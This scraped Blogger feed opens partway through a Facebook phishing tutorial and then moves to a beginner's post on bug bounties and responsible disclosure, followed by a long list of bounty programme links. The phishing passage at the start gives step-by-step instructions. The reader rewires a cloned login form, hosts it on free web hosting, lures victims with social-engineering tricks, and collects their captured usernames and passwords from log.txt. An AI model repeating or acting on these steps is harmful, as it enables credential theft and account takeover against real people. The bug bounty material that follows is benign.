recommended you to use Notepad++ for these kind of tasks, awesome and
flexible text editor), and find (Ctrl+F for find) keyword “action” here.
you will see a keyword action=”https://www.face****” something like
this, remove this whole link which is unde double quotes “” and put here
“login.php”. Save it and exit (Ctrl+S for save).</div>
<div style="text-align: justify;">
<b><span style="text-decoration: underline;">Step-6</span> :-</b>
Now upload login.php and index.html file to you file manager directory.
If it is cpanel account, upload files into file_manager ->
public_html or if it is 000webhost.com account upload index.html and
login.php into file manager as show in below image</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEiRmdx4xBX_pVBpSZXc_T1tpDhRGQfVlhUK-F7Dy2oXI_xiqnMBoiRJN1hg1x_4YLHrWb7kGn2wfz24YILvWUKqrX2SeKNfBke4wcVZ6D5D7BZorIUnX7ZJAsljg4bk4EJtsToA-CLJXNdJTcorXZz9GCrR-edACbqL2Q1TBkq0Qz6h2NFp=" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/proxy/AVvXsEiRmdx4xBX_pVBpSZXc_T1tpDhRGQfVlhUK-F7Dy2oXI_xiqnMBoiRJN1hg1x_4YLHrWb7kGn2wfz24YILvWUKqrX2SeKNfBke4wcVZ6D5D7BZorIUnX7ZJAsljg4bk4EJtsToA-CLJXNdJTcorXZz9GCrR-edACbqL2Q1TBkq0Qz6h2NFp=" width="320" /></a></div>
<div style="text-align: justify;">
If you are logged into your 000webhost.com account, click on the “<b>Go to Cpanel</b>“ in front of your domain that you had registered, and then Go to “<b>File Manager</b>” under Files and log into it. Now click on the <b>public_html</b>. Now click on upload and upload your both files.</div>
<div style="text-align: justify;">
<b><span style="text-decoration: underline;">Step-7</span> :-</b>
Now visit to your subdomain, like yourname.000webhost.com and you will
see a phishing page of facebook.com. nowsend this link to a victim, say
anything like join my network or any social engineering trick and force
victim to visit you page and let him/her enter the username and
password. Once he/she enter information, username and password will be
save into log.txt file and victim will redirect to facebook’s original
link facebook.com. Victim will seems like he did enter wrong username
and password so he should enter again, when he again will enter a info,
he/she will successfully login into their facebook account. Game
over!!!!. :D </div>
<div style="text-align: justify;">
<b><span style="text-decoration: underline;">Step-8</span> :-</b>
Now go to yourname.000webhost.com/log.txt and see the username and
password of victim. or you can again visit to your cpanel, here in file
manager–>public_html you will se a file log.txt, open it to view
victim’s username and password.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<!-- Blogger automated replacement: "http://images-onepick-opensocial.googleusercontent.com/gadgets/proxy?container=onepick&gadget=a&rewriteMime=image%2F*&url=http%3A%2F%2Fwww.starthack.com%2Fwp-content%2Fuploads%2F2012%2F10%2Fhack-facebook.jpg" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEiRmdx4xBX_pVBpSZXc_T1tpDhRGQfVlhUK-F7Dy2oXI_xiqnMBoiRJN1hg1x_4YLHrWb7kGn2wfz24YILvWUKqrX2SeKNfBke4wcVZ6D5D7BZorIUnX7ZJAsljg4bk4EJtsToA-CLJXNdJTcorXZz9GCrR-edACbqL2Q1TBkq0Qz6h2NFp=" -->karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-64629688171716760792013-04-11T04:42:00.000-07:002013-05-12T07:13:56.950-07:00Disclosing Vulnerabilities: The BUG Bounty Way<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 class="post-title entry-title">
Disclosing Vulnerabilities: The BUG Bounty Way </h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSkEV9FywYCXDtKfHVVanu5xa0DipSrEE6Bw8joAJ7bTwBHCLt8TA" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSkEV9FywYCXDtKfHVVanu5xa0DipSrEE6Bw8joAJ7bTwBHCLt8TA" width="320" /></a></div>
After presenting this topic at NULL Bangalore Jan Meet, I got loads of
appreciation from various people , and one such appreciation I got was
from my <span class="IL_AD" id="IL_AD8">friend</span> Sabari Selvan. And that’s why I decided to write an article about the presentation I gave.<br />
<br />
This article gives you an insight with hunting bugs, and hopefully it becomes a kick-starter <span class="IL_AD" id="IL_AD7">guide for</span> <span class="IL_AD" id="IL_AD3">the beginners</span> who want <span class="IL_AD" id="IL_AD5">to start</span> off with bug bounty.<br />
<br />
Well, today hunting bugs in the wild has become a new trend. Coz almost
every company has started a responsible disclosure page and hence allows
hackers like us to make some name, fame and <span class="IL_AD" id="IL_AD10">money</span>…:P I too was fascinated to start off with bug bounty when I saw my friends around me getting those flashy <span class="IL_AD" id="IL_AD6">Facebook</span> Bug Bounty Whitehat Card or when they got a new payment for finding a bug or when they got a new T-Shirt from a company.<br />
<br />
Before knowing about BUG BOUNTY, let’s see the types in which the Vulnerability Disclosure is done.<br />
<br />
We generally have two ways of disclosing vulnerabilities:<br />
<br />
<ul style="text-align: left;">
<li>Full Disclosure</li>
<li>Responsible Disclosure</li>
</ul>
<b>Full Disclosure</b> is when a person goes onto his blog or any other
form of public media and writes about the vulnerability that he
discovered in the wild most of the times without informing the company
where he found the vulnerability. This would allow various other hackers
around the world to exploit this vulnerability. This would sometimes
lead to problems because the company where you found the bug has got
every right to take legal actions against you for letting out the
information.<br />
<br />
<b>Responsible Disclosure</b><br />
Responsible Disclosure is where the person who finds a vulnerability in a
website directly tells it to the authorities of that website, so that
they can rectify the issue as early as possible. And most of the
companies reward them in return for reporting the vulnerability. And
this is what is BUG BOUNTY.<br />
<br />
Well, bug bounty is indeed really a nice way to <span class="IL_AD" id="IL_AD1">earn money</span>. But <span class="IL_AD" id="IL_AD9">more than money</span>
when your name comes up in their HALL OF FAME or the company’s
RESPONSIBLE DISCLOSURE page, then that’s priceless. Coz that is what
gives your resume some extra weightage and makes you stand out when
compared to your peers.<br />
<br />
<b>Books to read before Hunting Bugs:</b><br />
Well, these are the book I generally recommend anyone who wants to start off with web application pen-testing or particularly BUG BOUNTY. <br />
<br />
<ul style="text-align: left;">
<li>Web Application Hackers Handbook , Second Edition(Considered to be the Bible of Web Application Pen-testers)</li>
<li>Hacking- The Art Of Exploitation</li>
<li>OWASP Testing Guide v3.0</li>
</ul>
<br />
<br />
<b>BUG Hunter’s TOOLKIT:</b><br />
These are the basic tools that most of the bug hunters generally use and suggest.<br />
<b>Proxy:</b><br />
<br />
<ul style="text-align: left;">
<li>Burp Suite</li>
<li>Web Scarab</li>
<li>Fiddler</li>
<li>Paros Proxy</li>
</ul>
<br />
Mozilla Firefox is the best browser if you want to hunt bugs. And it is
the best one coz of its awesome addons that ease our job.<br />
<br />
<b>Mozilla Firefox ADDONS:</b><br />
<br />
<ul style="text-align: left;">
<li>Tamper Data</li>
<li>Web Developer Extensions</li>
<li>Live HTTP Headers</li>
<li>Firebug</li>
<li>XSS Me Sidebar</li>
<li>Hackbar</li>
<li>And many more...</li>
</ul>
<br />
<b>Other Useful Tools:</b><br />
<br />
<ul style="text-align: left;">
<li>IRONWASP</li>
<li>XENOTIX</li>
</ul>
<br />
<br />
<b>Optional Tools:</b><br />
Camtasia Sreen Recorder and Snipping Tools (Useful for creating Proof Of Concepts).<br />
<br />
<b>List Of BUG BOUNTY Programs:</b><br />
Well here is the link that provides you a BIG list of Bug Bounty Programs and Responsible Disclosure Pages.<br />
<a href="http://www.ehackingnews.com/2012/12/list-of-bug-bounty-program-for.html" target="_blank">http://mr-munjal1.blogspot.in/2013/04/list-of-bug-bounty-programs-from-all.html</a><br />
<br />
<b>Other ways to earn BOUNTY:</b><br />
Recently I came across this new startup called BugCrowd that manage organized Bug Bounty for various companies. <br />
<br />
Just register yourself to start off with hunting bugs and earn money.<br />
<a href="http://bugcrowd.com/?kid=NG66" target="_blank">http://bugcrowd.com/?kid=NG66</a><br />
<br />
It’s a nice initiative indeed where in it’s a win-win situation for
everyone. The company gets its site tested from best of the best hackers
across the globe and indeed the hackers get paid for finding bugs and
reporting it to them.<br />
<br />
Anyways, I hope the above article gives enough info to start off with Bug Hunting. Anyways I wish <span class="IL_AD" id="IL_AD2">ALL THE BEST</span> to all the beginners who want to start off with Bug Hunting.<br />
Always Remember:<br />
<br />
“If you’re good at Something, then never do it for FREE…!!!”<br />
Happy Hunting…;-D<h3 class="post-title entry-title">
</h3>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-89198779504815780252013-04-10T08:21:00.001-07:002013-05-12T07:14:24.006-07:00List of Bug Bounty Programs from all over the World<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 class="post-title entry-title" itemprop="name">
List of Bug Bounty Programs from all over the World </h3>
<h3 class="post-title entry-title" itemprop="name">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif; font-size: medium;">List of Bug Bounty Programs for Security Researchers and Bug Hunters</span></b></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEib5VW2chU8XLZzFOfsGAFtdI8pZu6nDdbrMbXUr0FOl_x2oJRpXdb3nr6CIajgtpFdu-H2i2w54egtNemCnj_qcABRI4lMCC4tgcR7cYeEqnWxeW1Q5-OKJm3nO9LtNhobZVxCWibAFcFFxFID9RN2UuLepWlhbO2oXSf2cWcUJ_EQKaarMoeVFfscWr5_rEmLmuti=" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/proxy/AVvXsEib5VW2chU8XLZzFOfsGAFtdI8pZu6nDdbrMbXUr0FOl_x2oJRpXdb3nr6CIajgtpFdu-H2i2w54egtNemCnj_qcABRI4lMCC4tgcR7cYeEqnWxeW1Q5-OKJm3nO9LtNhobZVxCWibAFcFFxFID9RN2UuLepWlhbO2oXSf2cWcUJ_EQKaarMoeVFfscWr5_rEmLmuti=" width="320" /></a></div>
<div style="text-align: center;">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;">A
well known topic and on the heat these days Bug Bounty Program, well
known companies paying for finding a critical vulnerability in their </span></b><b><span style="color: red; font-family: Trebuchet MS, sans-serif;">web servers, products, services or some associated applications. </span></b></div>
<div style="text-align: center;">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;">So here is a list for you all hunters to target .. All The Best</span></b><br />
<a href="http://www.blogger.com/blogger.g?blogID=7579126592452208824" name="more"></a></div>
<div style="text-align: center;">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;"><br /></span></b></div>
<div style="text-align: left;">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;">Bounty gifting Websites for Web Application Vulnerabilities </span></b></div>
<div style="text-align: left;">
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;"><br /></span></b></div>
<b><span style="font-family: Trebuchet MS, sans-serif;">Mozilla</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.mozilla.org/security" target="_blank">http://www.mozilla.org/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.mozilla.org/projects/security/security-bugs-policy.html" target="_blank">http://www.mozilla.org/projects/security/security-bugs-policy.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.mozilla.org/security/announce" target="_blank">http://www.mozilla.org/security/announce</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Google</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2" target="_blank">https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Facebook</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.facebook.com/whitehat/bounty" target="_blank">http://www.facebook.com/whitehat/bounty</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Paypal</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues" target="_blank">https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Etsy</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.etsy.com/" target="_blank">http://www.etsy.com</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Wordpress</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html" target="_blank">http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Commonsware</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://commonsware.com/bounty.html" target="_blank">http://commonsware.com/bounty.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">CCBill</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.ccbill.com/developers/security/vulnerability-reward-program.php" target="_blank">http://www.ccbill.com/developers/security/vulnerability-reward-program.php</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.ccbill.com/developers/security/rewards.php" target="_blank">http://www.ccbill.com/developers/security/rewards.php </a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Vark</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.vark.com/" target="_blank">http://www.vark.com</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Windthorstisd</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.windthorstisd.net/BugReport.cfm" target="_blank">http://www.windthorstisd.net/BugReport.cfm</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;">Bug Bounty Websites for Products Vulnerability </span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Mozilla</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.mozilla.org/security" target="_blank">http://www.mozilla.org/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.mozilla.org/security/known-vulnerabilities/firefox.html" target="_blank">http://www.mozilla.org/security/known-vulnerabilities/firefox.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Google Chrome</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program" target="_blank">http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">AT&T</span></b><br />
<span style="font-family: Trebuchet MS, sans-serif;"><b><a href="http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235">http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235</a></b></span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<b><span style="font-family: Trebuchet MS, sans-serif;">Zero Day Initiative</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.zerodayinitiative.com/" target="_blank">http://www.zerodayinitiative.com</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Barracuda</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.barracudalabs.com/bugbounty" target="_blank">http://www.barracudalabs.com/bugbounty</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Artifex Software</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.ghostscript.com/Bug_bounty_program.html" target="_blank">http://www.ghostscript.com/Bug_bounty_program.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Hex Rays</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.hex-rays.com/bugbounty.shtml" target="_blank">http://www.hex-rays.com/bugbounty.shtml</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Ardour</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://ardour.org/bugbounty">http://ardour.org/bugbounty</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Piwik</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://piwik.org/security">http://piwik.org/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="color: red; font-family: Trebuchet MS, sans-serif;">Hall of Fame Websites(No Bounties)</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Microsoft</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://technet.microsoft.com/en-us/security/ff852094.aspx">http://technet.microsoft.com/en-us/security/ff852094.aspx</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://technet.microsoft.com/en-us/security/cc308589">http://technet.microsoft.com/en-us/security/cc308589</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://technet.microsoft.com/en-us/security/cc308575">http://technet.microsoft.com/en-us/security/cc308575</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://technet.microsoft.com/en-us/security/cc261624">http://technet.microsoft.com/en-us/security/cc261624</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.microsoft.com/security/msrc/default.aspx">http://www.microsoft.com/security/msrc/default.aspx</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Apple</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://support.apple.com/kb/HT1318">http://support.apple.com/kb/HT1318</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Adobe</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.adobe.com/support/security/bulletins/securityacknowledgments.html">http://www.adobe.com/support/security/bulletins/securityacknowledgments.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.adobe.com/support/security/alertus.html">http://www.adobe.com/support/security/alertus.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">IBM</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www-03.ibm.com/security/secure-engineering/report.html">http://www-03.ibm.com/security/secure-engineering/report.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Twitter</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://twitter.com/about/security">https://twitter.com/about/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#">http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://support.twitter.com/forms">https://support.twitter.com/forms</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Dropbox</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;">security@dropbox.com</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://www.dropbox.com/security">https://www.dropbox.com/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://www.dropbox.com/special_thanks">https://www.dropbox.com/special_thanks</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Cisco</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://tools.cisco.com/security/center/home.x#%7Ealerts">http://tools.cisco.com/security/center/home.x#~alerts</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Moodle</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://moodle.org/security">http://moodle.org/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Drupal</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://drupal.org/security-team">http://drupal.org/security-team</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Oracle</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.oracle.com/us/support/assurance/reporting/index.html">http://www.oracle.com/us/support/assurance/reporting/index.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Symantec</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.symantec.com/security">http://www.symantec.com/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Ebay</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://pages.ebay.com/securitycenter/Researchers.html">http://pages.ebay.com/securitycenter/Researchers.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Twilio</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html">http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">37 Signals</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://37signals.com/security-response">http://37signals.com/security-response</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"> </span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"></span></b><b><span style="font-family: Trebuchet MS, sans-serif;">Salesforce</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.salesforce.com/company/privacy/disclosure.jsp">http://www.salesforce.com/company/privacy/disclosure.jsp</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Reddit</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://code.reddit.com/wiki/help/whitehat">http://code.reddit.com/wiki/help/whitehat</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Github</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://help.github.com/responsible-disclosure/">http://help.github.com/responsible-disclosure/</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Ifixit</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.ifixit.com/Info/responsible_disclosure">http://www.ifixit.com/Info/responsible_disclosure</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Constant Contact</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp">http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Zeggio</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.zeggio.com/">http://www.zeggio.com</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Simplify</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://simplify-llc.com/simplify-security.html">http://simplify-llc.com/simplify-security.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Team Unify</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.teamunify.com/__corp__/security.php">http://www.teamunify.com/__corp__/security.php</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Skoodat</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.skoodat.com/Security">http://www.skoodat.com/Security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Relaso</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://relaso.com/disclosure">http://relaso.com/disclosure</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Moduscsr</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.moduscsr.com/security_statement.php">http://www.moduscsr.com/security_statement.php</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Cloudnetz</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://cloudnetz.com/Legal/vulnerability-testing-policy.html">http://cloudnetz.com/Legal/vulnerability-testing-policy.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Emptrust</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.emptrust.com/Security.aspx">http://www.emptrust.com/Security.aspx</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Apriva</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.apriva.com/security">http://www.apriva.com/security</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Amazon</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://aws.amazon.com/security/vulnerability-reporting">http://aws.amazon.com/security/vulnerability-reporting</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">SqaureUp</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="https://squareup.com/security/levels">https://squareup.com/security/levels</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">G-Sec</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.g-sec.lu/responsible.disclosure.policy.html">http://www.g-sec.lu/responsible.disclosure.policy.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><br /></span></b>
<b><span style="font-family: Trebuchet MS, sans-serif;">Xen</span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"><a href="http://www.xen.org/projects/security_vulnerability_process.html">http://www.xen.org/projects/security_vulnerability_process.html</a></span></b><br />
<b><span style="font-family: Trebuchet MS, sans-serif;"></span></b><br />
